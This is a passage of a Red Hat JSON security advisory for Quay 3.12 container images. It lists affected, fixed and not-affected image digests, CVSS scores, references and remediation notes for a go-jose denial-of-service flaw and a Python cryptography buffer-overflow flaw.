          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "RHBZ#2455470",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455470"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-34986",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8",
          "url": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants",
          "url": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants"
        }
      ],
      "release_date": "2026-04-06T16:22:45.353000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object"
    },
    {
      "cve": "CVE-2026-39892",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-08T22:00:59.416053+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456735"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the cryptography library. This vulnerability occurs when a non-contiguous buffer is passed to certain application programming interfaces (APIs) that accept Python buffers, such as Hash.update(). A remote attacker could exploit this to cause a buffer overflow, potentially leading to a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "In default configurations Red Hat products isolate service processes from total system access. Should an attacker be able to exploit this vulnerability their impact will be limited to that service account and they will not have access to the broader system.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456735",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456735"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-39892",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39892"
        },
        {
          "category": "external",
          "summary": "http://www.openwall.com/lists/oss-security/2026/04/08/12",
          "url": "http://www.openwall.com/lists/oss-security/2026/04/08/12"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5",
          "url": "https://github.com/pyca/cryptography/commit/622d672e429a7cff836a23c5903683dbec1901f5"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq",
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-p423-j2cm-9vmq"
        }
      ],
      "release_date": "2026-04-08T20:49:41.967000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
